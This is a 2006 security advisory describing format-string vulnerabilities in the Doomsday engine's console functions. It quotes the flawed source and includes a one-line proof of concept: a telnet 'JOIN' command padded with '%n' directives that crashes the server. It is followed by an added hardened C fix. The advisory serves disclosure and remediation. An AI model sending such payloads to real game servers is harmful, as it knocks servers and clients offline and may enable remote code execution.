#######################################################################

                             Luigi Auriemma

Application:  Doomsday engine
              http://www.doomsdayhq.com
              http://deng.sourceforge.net
Versions:     <= 1.8.6 (and SVN 1.9.0)
Platforms:    Windows, *nix, *BSD, Mac and others
Bug:          format string bug in Con_Message and Con_Printf
Exploitation: remote, against server and clients
Date:         03 Apr 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

The Doomsday engine is a well-known open source port of the original
engine of good old Doom. It is also one of the most played on the
Internet.

#######################################################################

======
2) Bug
======

The Doomsday engine contains several functions used to display messages
in the console. Both Con_Message and conPrintf are affected by a format
string vulnerability that could allow an attacker to execute malicious
code against the server or the clients.

The first function calls "Con_Printf(buffer)", where buffer is the
already formatted message, while the second calls "SW_Printf(prbuff)" if
SW_IsActive is enabled (which it always is).

From Src/con_main.c:

    void Con_Message(const char *message, ...)
    {
        va_list argptr;
        char   *buffer;

        if(message[0])
        {
            buffer = malloc(0x10000);

            va_start(argptr, message);
            vsprintf(buffer, message, argptr);
            va_end(argptr);

    #ifdef UNIX
            if(!isDedicated)
            {
                // These messages are supposed to be visible in the real console.
                fprintf(stderr, "%s", buffer);
            }
    #endif

            // These messages are always dumped. If consoleDump is set,
            // Con_Printf() will dump the message for us.
            if(!consoleDump)
                printf("%s", buffer);

            // Also print in the console.
            Con_Printf(buffer);

            free(buffer);
        }
        Con_DrawStartupScreen(true);
    }

    ...

    void conPrintf(int flags, const char *format, va_list args)
    {
        unsigned int i;
        int      lbc;   // line buffer cursor
        char    *prbuff, *lbuf = malloc(maxLineLen + 1);
        cbline_t *line;

        if(flags & CBLF_RULER)
        {
            Con_AddRuler();
            flags &= ~CBLF_RULER;
        }

        // Allocate a print buffer that will surely be enough (64Kb).
        // FIXME: No need to allocate on EVERY printf call!
        prbuff = malloc(65536);

        // Format the message to prbuff.
        vsprintf(prbuff, format, args);

        if(consoleDump)
            fprintf(outFile, "%s", prbuff);
        if(SW_IsActive())
            SW_Printf(prbuff);

    ...

#######################################################################

===========
3) The Code
===========

Connect with telnet to port 13209 (the default) of the DoomsDay server
and type:

    JOIN 1234 %n%n%n%n%n%n

The server will crash immediately.

#######################################################################

======
4) Fix
======

No fix. No response from the developers.

#######################################################################
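The defect in section 2 is that Con_Message formats the message once and then hands the formatted result to Con_Printf as a new format string, so any "%" directives that arrived in a JOIN line are interpreted a second time. The following is an added example, not code from the advisory or from the Doomsday project: hardened stand-ins (hypothetical names con_printf_fixed, con_message_fixed and format_join_notice) that pass the already formatted text through "%s" and use bounded vsnprintf, so the string from section 3 is logged verbatim instead of being interpreted.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hardened stand-in for Con_Printf (hypothetical name). The format
 * parameter is still a format string, so callers must only ever pass a
 * string literal here, never data received from a client. */
static void con_printf_fixed(char *out, size_t outlen, const char *format, ...)
{
    va_list args;

    va_start(args, format);
    vsnprintf(out, outlen, format, args);   /* bounded, unlike vsprintf */
    va_end(args);
}

/* Hardened stand-in for Con_Message (hypothetical name). It formats into
 * a local buffer exactly once, then forwards the result as the argument
 * of a literal "%s" format, which is the one-line fix for the original
 * "Con_Printf(buffer)" call. A "%n" inside a player name or JOIN line is
 * therefore plain text. Buffer sized down from the engine's 64Kb. */
static void con_message_fixed(char *out, size_t outlen, const char *message, ...)
{
    char    buffer[4096];
    va_list argptr;

    if(!message[0])
    {
        out[0] = '\0';
        return;
    }

    va_start(argptr, message);
    vsnprintf(buffer, sizeof buffer, message, argptr);
    va_end(argptr);

    con_printf_fixed(out, outlen, "%s", buffer);
}

/* Server-side logging of one line received from a client. The format
 * string is a literal; client_line only ever travels as an argument.
 * Returns the length of the text written to out. */
int format_join_notice(char *out, size_t outlen, const char *client_line)
{
    con_message_fixed(out, outlen, "Client sent: %s\n", client_line);
    return (int)strlen(out);
}
```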